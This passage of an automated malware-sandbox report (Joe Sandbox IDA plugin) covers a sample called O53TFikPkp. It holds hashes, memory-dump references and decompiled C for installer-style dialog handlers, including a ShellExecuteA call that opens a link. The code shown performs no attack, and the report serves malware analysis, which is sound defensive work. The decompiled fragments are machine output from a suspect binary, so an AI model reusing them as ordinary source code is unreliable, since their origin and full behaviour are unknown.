                                                                                            • Instruction ID: a6e2d518a40bf7d18fd5d4db6757c66f90c1c218e09436dcbab70eea96d9b447
                                                                                            • Opcode Fuzzy Hash: 195a289bea6c427d6dd0e94af631ce1939ca6bc38f5db606016c202de45f5cbb
                                                                                            • Instruction Fuzzy Hash: 35617D71E00214ABDF20DBA4C884BAEB7F5EF98B10F248059F915EB390EB749E01CB55
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.666477775.000000000019E000.00000040.00000001.sdmp, Offset: 0019E000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_19e000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f4324828f627b6bb0fb9c77ef1135b1a25c16c170ba8a3c28242676e39d3c830
                                                                                            • Instruction ID: 85e24e79408af9b98e40a5a07b0428f54c9fc13b8113ad3b3a96cf1451ade7c5
                                                                                            • Opcode Fuzzy Hash: f4324828f627b6bb0fb9c77ef1135b1a25c16c170ba8a3c28242676e39d3c830
                                                                                            • Instruction Fuzzy Hash: 5F11C272A10119EFDF60DBAAC8888AEF7FDEF55BA4B5440A6F805D3211F7309E40C660
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.666477775.000000000019E000.00000040.00000001.sdmp, Offset: 0019E000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_19e000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 16547e1fdedecc12c00c52f4e517689794c9225d74c133a4488530a871c9f38f
                                                                                            • Instruction ID: 09032ba175238924c21d938275d0558ccb0dbc0a6a993500222489296c19f94e
                                                                                            • Opcode Fuzzy Hash: 16547e1fdedecc12c00c52f4e517689794c9225d74c133a4488530a871c9f38f
                                                                                            • Instruction Fuzzy Hash: 56E09A39760608DFCB14CBA8C881D29B3F8EB59320B114290FC16CB3A0EB34FE00DA50
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.666477775.000000000019E000.00000040.00000001.sdmp, Offset: 0019E000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_19e000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
                                                                                            • Instruction ID: e154fc794cec9037467ecacd367ad0e31c5e78e66cef11178a97ff2dcca974a4
                                                                                            • Opcode Fuzzy Hash: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
                                                                                            • Instruction Fuzzy Hash: E3E08C36310650CBCB60DA19C480952F3EAFB987B171A486AE88AD7722D730FC00CA60
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.666477775.000000000019E000.00000040.00000001.sdmp, Offset: 0019E000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_19e000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                                                                            • Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
                                                                                            • Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                                                                            • Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 83%
                                                                                            			E00403964(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
                                                                                            				struct HWND__* _v32;
                                                                                            				void* _v84;
                                                                                            				void* _v88;
                                                                                            				void* __ebx;
                                                                                            				void* __edi;
                                                                                            				void* __esi;
                                                                                            				signed int _t35;
                                                                                            				signed int _t37;
                                                                                            				signed int _t39;
                                                                                            				struct HWND__* _t49;
                                                                                            				signed int _t67;
                                                                                            				struct HWND__* _t73;
                                                                                            				signed int _t86;
                                                                                            				struct HWND__* _t91;
                                                                                            				signed int _t99;
                                                                                            				int _t103;
                                                                                            				signed int _t115;
                                                                                            				signed int _t116;
                                                                                            				int _t117;
                                                                                            				signed int _t122;
                                                                                            				struct HWND__* _t125;
                                                                                            				struct HWND__* _t126;
                                                                                            				int _t127;
                                                                                            				long _t130;
                                                                                            				int _t132;
                                                                                            				int _t133;
                                                                                            				void* _t134;
                                                                                            
                                                                                            				_t115 = _a8;
                                                                                            				if(_t115 == 0x110 || _t115 == 0x408) {
                                                                                            					_t35 = _a12;
                                                                                            					_t125 = _a4;
                                                                                            					__eflags = _t115 - 0x110;
                                                                                            					 *0x42047c = _t35;
                                                                                            					if(_t115 == 0x110) {
                                                                                            						 *0x423ea8 = _t125;
                                                                                            						 *0x420490 = GetDlgItem(_t125, 1);
                                                                                            						_t91 = GetDlgItem(_t125, 2);
                                                                                            						_push(0xffffffff);
                                                                                            						_push(0x1c);
                                                                                            						 *0x41f458 = _t91;
                                                                                            						E00403E37(_t125);
                                                                                            						SetClassLongA(_t125, 0xfffffff2,  *0x423688);
                                                                                            						 *0x42366c = E0040140B(4);
                                                                                            						_t35 = 1;
                                                                                            						__eflags = 1;
                                                                                            						 *0x42047c = 1;
                                                                                            					}
                                                                                            					_t122 =  *0x4091bc; // 0xffffffff
                                                                                            					_t133 = 0;
                                                                                            					_t130 = (_t122 << 6) +  *0x423ec0;
                                                                                            					__eflags = _t122;
                                                                                            					if(_t122 < 0) {
                                                                                            						L34:
                                                                                            						E00403E83(0x40b);
                                                                                            						while(1) {
                                                                                            							_t37 =  *0x42047c;
                                                                                            							 *0x4091bc =  *0x4091bc + _t37;
                                                                                            							_t130 = _t130 + (_t37 << 6);
                                                                                            							_t39 =  *0x4091bc; // 0xffffffff
                                                                                            							__eflags = _t39 -  *0x423ec4;
                                                                                            							if(_t39 ==  *0x423ec4) {
                                                                                            								E0040140B(1);
                                                                                            							}
                                                                                            							__eflags =  *0x42366c - _t133;
                                                                                            							if( *0x42366c != _t133) {
                                                                                            								break;
                                                                                            							}
                                                                                            							__eflags =  *0x4091bc -  *0x423ec4; // 0xffffffff
                                                                                            							if(__eflags >= 0) {
                                                                                            								break;
                                                                                            							}
                                                                                            							_t116 =  *(_t130 + 0x14);
                                                                                            							E00405AA7(_t116, _t125, _t130, 0x42b800,  *((intOrPtr*)(_t130 + 0x24)));
                                                                                            							_push( *((intOrPtr*)(_t130 + 0x20)));
                                                                                            							_push(0xfffffc19);
                                                                                            							E00403E37(_t125);
                                                                                            							_push( *((intOrPtr*)(_t130 + 0x1c)));
                                                                                            							_push(0xfffffc1b);
                                                                                            							E00403E37(_t125);
                                                                                            							_push( *((intOrPtr*)(_t130 + 0x28)));
                                                                                            							_push(0xfffffc1a);
                                                                                            							E00403E37(_t125);
                                                                                            							_t49 = GetDlgItem(_t125, 3);
                                                                                            							__eflags =  *0x423f2c - _t133;
                                                                                            							_v32 = _t49;
                                                                                            							if( *0x423f2c != _t133) {
                                                                                            								_t116 = _t116 & 0x0000fefd | 0x00000004;
                                                                                            								__eflags = _t116;
                                                                                            							}
                                                                                            							ShowWindow(_t49, _t116 & 0x00000008);
                                                                                            							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
                                                                                            							E00403E59(_t116 & 0x00000002);
                                                                                            							_t117 = _t116 & 0x00000004;
                                                                                            							EnableWindow( *0x41f458, _t117);
                                                                                            							__eflags = _t117 - _t133;
                                                                                            							if(_t117 == _t133) {
                                                                                            								_push(1);
                                                                                            							} else {
                                                                                            								_push(_t133);
                                                                                            							}
                                                                                            							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
                                                                                            							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
                                                                                            							__eflags =  *0x423f2c - _t133;
                                                                                            							if( *0x423f2c == _t133) {
                                                                                            								_push( *0x420490);
                                                                                            							} else {
                                                                                            								SendMessageA(_t125, 0x401, 2, _t133);
                                                                                            								_push( *0x41f458);
                                                                                            							}
                                                                                            							E00403E6C();
                                                                                            							E00405A85(0x420498, 0x4236a0);
                                                                                            							E00405AA7(0x420498, _t125, _t130,  &(0x420498[lstrlenA(0x420498)]),  *((intOrPtr*)(_t130 + 0x18)));
                                                                                            							SetWindowTextA(_t125, 0x420498);
                                                                                            							_push(_t133);
                                                                                            							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
                                                                                            							__eflags = _t67;
                                                                                            							if(_t67 != 0) {
                                                                                            								continue;
                                                                                            							} else {
                                                                                            								__eflags =  *_t130 - _t133;
                                                                                            								if( *_t130 == _t133) {
                                                                                            									continue;
                                                                                            								}
                                                                                            								__eflags =  *(_t130 + 4) - 5;
                                                                                            								if( *(_t130 + 4) != 5) {
                                                                                            									DestroyWindow( *0x423678);
                                                                                            									 *0x41fc68 = _t130;
                                                                                            									__eflags =  *_t130 - _t133;
                                                                                            									if( *_t130 <= _t133) {
                                                                                            										goto L58;
                                                                                            									}
                                                                                            									_t73 = CreateDialogParamA( *0x423ea0,  *_t130 +  *0x423680 & 0x0000ffff, _t125,  *(0x4091c0 +  *(_t130 + 4) * 4), _t130);
                                                                                            									__eflags = _t73 - _t133;
                                                                                            									 *0x423678 = _t73;
                                                                                            									if(_t73 == _t133) {
                                                                                            										goto L58;
                                                                                            									}
                                                                                            									_push( *((intOrPtr*)(_t130 + 0x2c)));
                                                                                            									_push(6);
                                                                                            									E00403E37(_t73);
                                                                                            									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
                                                                                            									ScreenToClient(_t125, _t134 + 0x10);
                                                                                            									SetWindowPos( *0x423678, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
                                                                                            									_push(_t133);
                                                                                            									E00401389( *((intOrPtr*)(_t130 + 0xc)));
                                                                                            									__eflags =  *0x42366c - _t133;
                                                                                            									if( *0x42366c != _t133) {
                                                                                            										goto L61;
                                                                                            									}
                                                                                            									ShowWindow( *0x423678, 8);
                                                                                            									E00403E83(0x405);
                                                                                            									goto L58;
                                                                                            								}
                                                                                            								__eflags =  *0x423f2c - _t133;
                                                                                            								if( *0x423f2c != _t133) {
                                                                                            									goto L61;
                                                                                            								}
                                                                                            								__eflags =  *0x423f20 - _t133;
                                                                                            								if( *0x423f20 != _t133) {
                                                                                            									continue;
                                                                                            								}
                                                                                            								goto L61;
                                                                                            							}
                                                                                            						}
                                                                                            						DestroyWindow( *0x423678);
                                                                                            						 *0x423ea8 = _t133;
                                                                                            						EndDialog(_t125,  *0x41f860);
                                                                                            						goto L58;
                                                                                            					} else {
                                                                                            						__eflags = _t35 - 1;
                                                                                            						if(_t35 != 1) {
                                                                                            							L33:
                                                                                            							__eflags =  *_t130 - _t133;
                                                                                            							if( *_t130 == _t133) {
                                                                                            								goto L61;
                                                                                            							}
                                                                                            							goto L34;
                                                                                            						}
                                                                                            						_push(0);
                                                                                            						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
                                                                                            						__eflags = _t86;
                                                                                            						if(_t86 == 0) {
                                                                                            							goto L33;
                                                                                            						}
                                                                                            						SendMessageA( *0x423678, 0x40f, 0, 1);
                                                                                            						__eflags =  *0x42366c;
                                                                                            						return 0 |  *0x42366c == 0x00000000;
                                                                                            					}
                                                                                            				} else {
                                                                                            					_t125 = _a4;
                                                                                            					_t133 = 0;
                                                                                            					if(_t115 == 0x47) {
                                                                                            						SetWindowPos( *0x420470, _t125, 0, 0, 0, 0, 0x13);
                                                                                            					}
                                                                                            					if(_t115 == 5) {
                                                                                            						asm("sbb eax, eax");
                                                                                            						ShowWindow( *0x420470,  ~(_a12 - 1) & _t115);
                                                                                            					}
                                                                                            					if(_t115 != 0x40d) {
                                                                                            						__eflags = _t115 - 0x11;
                                                                                            						if(_t115 != 0x11) {
                                                                                            							__eflags = _t115 - 0x111;
                                                                                            							if(_t115 != 0x111) {
                                                                                            								L26:
                                                                                            								return E00403E9E(_t115, _a12, _a16);
                                                                                            							}
                                                                                            							_t132 = _a12 & 0x0000ffff;
                                                                                            							_t126 = GetDlgItem(_t125, _t132);
                                                                                            							__eflags = _t126 - _t133;
                                                                                            							if(_t126 == _t133) {
                                                                                            								L13:
                                                                                            								__eflags = _t132 - 1;
                                                                                            								if(_t132 != 1) {
                                                                                            									__eflags = _t132 - 3;
                                                                                            									if(_t132 != 3) {
                                                                                            										_t127 = 2;
                                                                                            										__eflags = _t132 - _t127;
                                                                                            										if(_t132 != _t127) {
                                                                                            											L25:
                                                                                            											SendMessageA( *0x423678, 0x111, _a12, _a16);
                                                                                            											goto L26;
                                                                                            										}
                                                                                            										__eflags =  *0x423f2c - _t133;
                                                                                            										if( *0x423f2c == _t133) {
                                                                                            											_t99 = E0040140B(3);
                                                                                            											__eflags = _t99;
                                                                                            											if(_t99 != 0) {
                                                                                            												goto L26;
                                                                                            											}
                                                                                            											 *0x41f860 = 1;
                                                                                            											L21:
                                                                                            											_push(0x78);
                                                                                            											L22:
                                                                                            											E00403E10();
                                                                                            											goto L26;
                                                                                            										}
                                                                                            										E0040140B(_t127);
                                                                                            										 *0x41f860 = _t127;
                                                                                            										goto L21;
                                                                                            									}
                                                                                            									__eflags =  *0x4091bc - _t133; // 0xffffffff
                                                                                            									if(__eflags <= 0) {
                                                                                            										goto L25;
                                                                                            									}
                                                                                            									_push(0xffffffff);
                                                                                            									goto L22;
                                                                                            								}
                                                                                            								_push(_t132);
                                                                                            								goto L22;
                                                                                            							}
                                                                                            							SendMessageA(_t126, 0xf3, _t133, _t133);
                                                                                            							_t103 = IsWindowEnabled(_t126);
                                                                                            							__eflags = _t103;
                                                                                            							if(_t103 == 0) {
                                                                                            								goto L61;
                                                                                            							}
                                                                                            							goto L13;
                                                                                            						}
                                                                                            						SetWindowLongA(_t125, _t133, _t133);
                                                                                            						return 1;
                                                                                            					} else {
                                                                                            						DestroyWindow( *0x423678);
                                                                                            						 *0x423678 = _a12;
                                                                                            						L58:
                                                                                            						if( *0x421498 == _t133 &&  *0x423678 != _t133) {
                                                                                            							ShowWindow(_t125, 0xa);
                                                                                            							 *0x421498 = 1;
                                                                                            						}
                                                                                            						L61:
                                                                                            						return 0;
                                                                                            					}
                                                                                            				}
                                                                                            			}






























                                                                                            0x0040396d
                                                                                            0x00403976
                                                                                            0x00403ab7
                                                                                            0x00403abb
                                                                                            0x00403abf
                                                                                            0x00403ac1
                                                                                            0x00403ac6
                                                                                            0x00403ad1
                                                                                            0x00403adc
                                                                                            0x00403ae1
                                                                                            0x00403ae3
                                                                                            0x00403ae5
                                                                                            0x00403ae8
                                                                                            0x00403aed
                                                                                            0x00403afb
                                                                                            0x00403b08
                                                                                            0x00403b0f
                                                                                            0x00403b0f
                                                                                            0x00403b10
                                                                                            0x00403b10
                                                                                            0x00403b15
                                                                                            0x00403b1b
                                                                                            0x00403b22
                                                                                            0x00403b28
                                                                                            0x00403b2a
                                                                                            0x00403b6a
                                                                                            0x00403b6f
                                                                                            0x00403b74
                                                                                            0x00403b74
                                                                                            0x00403b79
                                                                                            0x00403b82
                                                                                            0x00403b84
                                                                                            0x00403b89
                                                                                            0x00403b8f
                                                                                            0x00403b93
                                                                                            0x00403b93
                                                                                            0x00403b98
                                                                                            0x00403b9e
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00403ba9
                                                                                            0x00403baf
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00403bb8
                                                                                            0x00403bc0
                                                                                            0x00403bc5
                                                                                            0x00403bc8
                                                                                            0x00403bce
                                                                                            0x00403bd3
                                                                                            0x00403bd6
                                                                                            0x00403bdc
                                                                                            0x00403be1
                                                                                            0x00403be4
                                                                                            0x00403bea
                                                                                            0x00403bf2
                                                                                            0x00403bf8
                                                                                            0x00403bfe
                                                                                            0x00403c02
                                                                                            0x00403c09
                                                                                            0x00403c09
                                                                                            0x00403c09
                                                                                            0x00403c13
                                                                                            0x00403c25
                                                                                            0x00403c31
                                                                                            0x00403c36
                                                                                            0x00403c40
                                                                                            0x00403c46
                                                                                            0x00403c48
                                                                                            0x00403c4d
                                                                                            0x00403c4a
                                                                                            0x00403c4a
                                                                                            0x00403c4a
                                                                                            0x00403c5d
                                                                                            0x00403c75
                                                                                            0x00403c77
                                                                                            0x00403c7d
                                                                                            0x00403c92
                                                                                            0x00403c7f
                                                                                            0x00403c88
                                                                                            0x00403c8a
                                                                                            0x00403c8a
                                                                                            0x00403c98
                                                                                            0x00403ca8
                                                                                            0x00403cb9
                                                                                            0x00403cc0
                                                                                            0x00403cc6
                                                                                            0x00403cca
                                                                                            0x00403ccf
                                                                                            0x00403cd1
                                                                                            0x00000000
                                                                                            0x00403cd7
                                                                                            0x00403cd7
                                                                                            0x00403cd9
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00403cdf
                                                                                            0x00403ce3
                                                                                            0x00403d08
                                                                                            0x00403d0e
                                                                                            0x00403d14
                                                                                            0x00403d16
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00403d3c
                                                                                            0x00403d42
                                                                                            0x00403d44
                                                                                            0x00403d49
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00403d4f
                                                                                            0x00403d52
                                                                                            0x00403d55
                                                                                            0x00403d6c
                                                                                            0x00403d78
                                                                                            0x00403d91
                                                                                            0x00403d97
                                                                                            0x00403d9b
                                                                                            0x00403da0
                                                                                            0x00403da6
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00403db0
                                                                                            0x00403dbb
                                                                                            0x00000000
                                                                                            0x00403dbb
                                                                                            0x00403ce5
                                                                                            0x00403ceb
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00403cf1
                                                                                            0x00403cf7
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00403cfd
                                                                                            0x00403cd1
                                                                                            0x00403dc8
                                                                                            0x00403dd4
                                                                                            0x00403ddb
                                                                                            0x00000000
                                                                                            0x00403b2c
                                                                                            0x00403b2c
                                                                                            0x00403b2f
                                                                                            0x00403b62
                                                                                            0x00403b62
                                                                                            0x00403b64
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00403b64
                                                                                            0x00403b31
                                                                                            0x00403b35
                                                                                            0x00403b3a
                                                                                            0x00403b3c
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00403b4c
                                                                                            0x00403b54
                                                                                            0x00000000
                                                                                            0x00403b5a
                                                                                            0x00403988
                                                                                            0x00403988
                                                                                            0x0040398c
                                                                                            0x00403991
                                                                                            0x004039a0
                                                                                            0x004039a0
                                                                                            0x004039a9
                                                                                            0x004039b2
                                                                                            0x004039bd
                                                                                            0x004039bd
                                                                                            0x004039c9
                                                                                            0x004039e5
                                                                                            0x004039e8
                                                                                            0x004039fb
                                                                                            0x00403a01
                                                                                            0x00403aa4
                                                                                            0x00000000
                                                                                            0x00403aad
                                                                                            0x00403a07
                                                                                            0x00403a14
                                                                                            0x00403a16
                                                                                            0x00403a18
                                                                                            0x00403a37
                                                                                            0x00403a37
                                                                                            0x00403a3a
                                                                                            0x00403a3f
                                                                                            0x00403a42
                                                                                            0x00403a52
                                                                                            0x00403a53
                                                                                            0x00403a55
                                                                                            0x00403a8b
                                                                                            0x00403a9e
                                                                                            0x00000000
                                                                                            0x00403a9e
                                                                                            0x00403a57
                                                                                            0x00403a5d
                                                                                            0x00403a76
                                                                                            0x00403a7b
                                                                                            0x00403a7d
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00403a7f
                                                                                            0x00403a6b
                                                                                            0x00403a6b
                                                                                            0x00403a6d
                                                                                            0x00403a6d
                                                                                            0x00000000
                                                                                            0x00403a6d
                                                                                            0x00403a60
                                                                                            0x00403a65
                                                                                            0x00000000
                                                                                            0x00403a65
                                                                                            0x00403a44
                                                                                            0x00403a4a
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00403a4c
                                                                                            0x00000000
                                                                                            0x00403a4c
                                                                                            0x00403a3c
                                                                                            0x00000000
                                                                                            0x00403a3c
                                                                                            0x00403a22
                                                                                            0x00403a29
                                                                                            0x00403a2f
                                                                                            0x00403a31
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00403a31
                                                                                            0x004039ed
                                                                                            0x00000000
                                                                                            0x004039cb
                                                                                            0x004039d1
                                                                                            0x004039db
                                                                                            0x00403de1
                                                                                            0x00403de7
                                                                                            0x00403df4
                                                                                            0x00403dfa
                                                                                            0x00403dfa
                                                                                            0x00403e04
                                                                                            0x00000000
                                                                                            0x00403e04
                                                                                            0x004039c9

                                                                                            APIs
                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004039A0
                                                                                            • ShowWindow.USER32(?), ref: 004039BD
                                                                                            • DestroyWindow.USER32 ref: 004039D1
                                                                                            • SetWindowLongA.USER32 ref: 004039ED
                                                                                            • GetDlgItem.USER32 ref: 00403A0E
                                                                                            • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403A22
                                                                                            • IsWindowEnabled.USER32(00000000), ref: 00403A29
                                                                                            • GetDlgItem.USER32 ref: 00403AD7
                                                                                            • GetDlgItem.USER32 ref: 00403AE1
                                                                                            • SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403AFB
                                                                                            • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403B4C
                                                                                            • GetDlgItem.USER32 ref: 00403BF2
                                                                                            • ShowWindow.USER32(00000000,?), ref: 00403C13
                                                                                            • EnableWindow.USER32(?,?), ref: 00403C25
                                                                                            • EnableWindow.USER32(?,?), ref: 00403C40
                                                                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403C56
                                                                                            • EnableMenuItem.USER32 ref: 00403C5D
                                                                                            • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403C75
                                                                                            • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403C88
                                                                                            • lstrlenA.KERNEL32(00420498,?,00420498,004236A0), ref: 00403CB1
                                                                                            • SetWindowTextA.USER32(?,00420498), ref: 00403CC0
                                                                                            • ShowWindow.USER32(?,0000000A), ref: 00403DF4
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.666527625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.666515944.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666540617.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666584246.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666656569.0000000000422000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666666204.0000000000429000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666680734.000000000042C000.00000002.00020000.sdmp Download File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                            • String ID:
                                                                                            • API String ID: 184305955-0
                                                                                            • Opcode ID: 71dbbfc470e5b7342f3a842f49b25357194f1f96d8345790fbe5660f06a32eef
                                                                                            • Instruction ID: caafd2a66b76c4ae3962cc82e2ded254e31ce9ec1c8840106f3b43a2641cb278
                                                                                            • Opcode Fuzzy Hash: 71dbbfc470e5b7342f3a842f49b25357194f1f96d8345790fbe5660f06a32eef
                                                                                            • Instruction Fuzzy Hash: 95C1AF71A04204BBDB206F21ED85E2B7E7CEB05706F40453EF641B12E1C779AA429F6E
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 93%
                                                                                            			E00403F7F(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
                                                                                            				char _v8;
                                                                                            				signed int _v12;
                                                                                            				void* _v16;
                                                                                            				struct HWND__* _t52;
                                                                                            				long _t86;
                                                                                            				int _t98;
                                                                                            				struct HWND__* _t99;
                                                                                            				signed int _t100;
                                                                                            				intOrPtr _t103;
                                                                                            				intOrPtr _t109;
                                                                                            				int _t110;
                                                                                            				signed int* _t112;
                                                                                            				signed int _t113;
                                                                                            				char* _t114;
                                                                                            				CHAR* _t115;
                                                                                            
                                                                                            				if(_a8 != 0x110) {
                                                                                            					if(_a8 != 0x111) {
                                                                                            						L11:
                                                                                            						if(_a8 != 0x4e) {
                                                                                            							if(_a8 == 0x40b) {
                                                                                            								 *0x420478 =  *0x420478 + 1;
                                                                                            							}
                                                                                            							L25:
                                                                                            							_t110 = _a16;
                                                                                            							L26:
                                                                                            							return E00403E9E(_a8, _a12, _t110);
                                                                                            						}
                                                                                            						_t52 = GetDlgItem(_a4, 0x3e8);
                                                                                            						_t110 = _a16;
                                                                                            						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
                                                                                            							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
                                                                                            							_t109 =  *((intOrPtr*)(_t110 + 0x18));
                                                                                            							_v12 = _t100;
                                                                                            							_v16 = _t109;
                                                                                            							_v8 = 0x422e40;
                                                                                            							if(_t100 - _t109 < 0x800) {
                                                                                            								SendMessageA(_t52, 0x44b, 0,  &_v16);
                                                                                            								SetCursor(LoadCursorA(0, 0x7f02));
                                                                                            								_t40 =  &_v8; // 0x422e40
                                                                                            								ShellExecuteA(_a4, "open",  *_t40, 0, 0, 1);
                                                                                            								SetCursor(LoadCursorA(0, 0x7f00));
                                                                                            								_t110 = _a16;
                                                                                            							}
                                                                                            						}
                                                                                            						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
                                                                                            							goto L26;
                                                                                            						} else {
                                                                                            							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
                                                                                            								SendMessageA( *0x423ea8, 0x111, 1, 0);
                                                                                            							}
                                                                                            							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
                                                                                            								SendMessageA( *0x423ea8, 0x10, 0, 0);
                                                                                            							}
                                                                                            							return 1;
                                                                                            						}
                                                                                            					}
                                                                                            					if(_a12 >> 0x10 != 0 ||  *0x420478 != 0) {
                                                                                            						goto L25;
                                                                                            					} else {
                                                                                            						_t103 =  *0x41fc68; // 0x0
                                                                                            						_t25 = _t103 + 0x14; // 0x14
                                                                                            						_t112 = _t25;
                                                                                            						if(( *_t112 & 0x00000020) == 0) {
                                                                                            							goto L25;
                                                                                            						}
                                                                                            						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                                                                                            						E00403E59(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                                                                                            						E0040420A();
                                                                                            						goto L11;
                                                                                            					}
                                                                                            				}
                                                                                            				_t98 = _a16;
                                                                                            				_t113 =  *(_t98 + 0x30);
                                                                                            				if(_t113 < 0) {
                                                                                            					_t113 =  *( *0x42367c - 4 + _t113 * 4);
                                                                                            				}
                                                                                            				_push( *((intOrPtr*)(_t98 + 0x34)));
                                                                                            				_t114 = _t113 +  *0x423ed8;
                                                                                            				_push(0x22);
                                                                                            				_a16 =  *_t114;
                                                                                            				_v12 = _v12 & 0x00000000;
                                                                                            				_t115 = _t114 + 1;
                                                                                            				_v16 = _t115;
                                                                                            				_v8 = E00403F4B;
                                                                                            				E00403E37(_a4);
                                                                                            				_push( *((intOrPtr*)(_t98 + 0x38)));
                                                                                            				_push(0x23);
                                                                                            				E00403E37(_a4);
                                                                                            				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                                                                                            				E00403E59( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
                                                                                            				_t99 = GetDlgItem(_a4, 0x3e8);
                                                                                            				E00403E6C(_t99);
                                                                                            				SendMessageA(_t99, 0x45b, 1, 0);
                                                                                            				_t86 =  *( *0x423eb0 + 0x68);
                                                                                            				if(_t86 < 0) {
                                                                                            					_t86 = GetSysColor( ~_t86);
                                                                                            				}
                                                                                            				SendMessageA(_t99, 0x443, 0, _t86);
                                                                                            				SendMessageA(_t99, 0x445, 0, 0x4010000);
                                                                                            				 *0x41f45c =  *0x41f45c & 0x00000000;
                                                                                            				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
                                                                                            				SendMessageA(_t99, 0x449, _a16,  &_v16);
                                                                                            				 *0x420478 =  *0x420478 & 0x00000000;
                                                                                            				return 0;
                                                                                            			}


















                                                                                            0x00403f8f
                                                                                            0x004040b5
                                                                                            0x00404111
                                                                                            0x00404115
